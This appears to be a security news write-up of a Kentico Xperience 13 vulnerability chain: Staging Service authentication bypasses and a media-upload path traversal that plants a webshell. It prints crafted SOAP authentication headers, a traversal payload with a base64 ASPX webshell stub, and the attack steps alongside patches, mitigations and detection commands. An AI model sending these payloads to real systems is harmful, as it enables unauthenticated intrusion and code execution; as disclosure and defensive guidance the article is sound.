A chain of vulnerabilities in Kentico Xperience CMS 13 allows unauthenticated attackers to execute arbitrary code on unpatched systems.
The flaws – including two authentication bypasses and a post-auth path traversal – affect installations using the Staging Service with username/password authentication.
Vulnerability Breakdown
WT-2025-0006: Staging Service Authentication Bypass
The initial attack vector exploits improper WS-Security handling in the deprecated Microsoft Web Services Enhancement 3.0 (WSE3) library.
The vulnerable flow:
- SOAP Header Manipulation
Attackers send crafted XML withPasswordDigesttype and empty credentials: xml<wsse:UsernameToken> <wsse:Username>invalid_user</wsse:Username> <wsse:Password Type="PasswordDigest"></wsse:Password> <wsse:Nonce>MTIzNDU2Nzg=</wsse:Nonce> <wsu:Created>2025-01-01T00:00:00Z</wsu:Created> </wsse:UsernameToken> - Flawed Hash Verification
TheAuthenticateTokenmethod returns an empty string for invalid usernames, enabling the hash calculation of nonce + timestamp instead of valid credentials.
Impact: Full admin access to the Staging API without authentication.
WT-2025-0007: Post-Auth Remote Code Execution
After bypassing authentication, attackers exploit a path traversal vulnerability during media file uploads:
xml<Media_File>
<FilePath>../../../../../../../../inetpub/wwwroot/</FilePath>
<FileExtension>.aspx</FileExtension>
</Media_File>
<BinaryData>
<FileBinaryData>PCVAIGxhbmd1YWdlPSJDIiAlPg==</FileBinaryData> <!-- Base64 ASPX webshell -->
</BinaryData>
Key flaws:
- Unrestricted directory traversal in
CheckAndEnsureFilePathmethod - Arbitrary binary data acceptance via
TaskBinaryData
Result: Webshell deployment to web-accessible directory.
WT-2025-0011: Secondary Authentication Bypass
A second bypass was discovered in WSE3’s PasswordOption.SendNone handling:
xml<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<!-- No password element -->
</wsse:UsernameToken>
Behavior:
- Versions 13.0.173-177 require a valid username (default:
admin) - Pre-13.0.173 accepts any username
Technical Impact
Combining these flaws enables a full attack chain:
- Bypass auth via WT-2025-0006/0011
- Create malicious media library entry
- Upload web shell via path traversal
- Execute OS commands via HTTP requests
Affected Versions & Mitigation
| Version Range | Vulnerabilities | Patch Version |
|---|---|---|
| 13.0.0 – 13.0.172 | WT-2025-0006,0007,0011 | 13.0.178 |
| 13.0.173 – 13.0.177 | WT-2025-0007,0011 | 13.0.178 |
Immediate Actions:
- Upgrade to ≥13.0.178
- Disable Staging Service if unused
- Switch to X.509 authentication for required deployments
Vendor Response & Detection
Kentico released patches within 6 days of disclosure. Security teams can use watchTowr’s detection scripts:
bash# WT-2025-0006 Check
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0006.py -H http://target
# WT-2025-0011 Check
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0011.py -H http://target -u admin
Security Takeaway: These vulnerabilities highlight the risks of using deprecated libraries like WSE3.
Organizations must audit third-party dependencies and implement layered API security controls, even for “internal” services.
Also Read:
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The flaws - including two authentication bypasses and a post-auth path traversal - affect installations using the Staging Service with username/password authentication.){kind=link}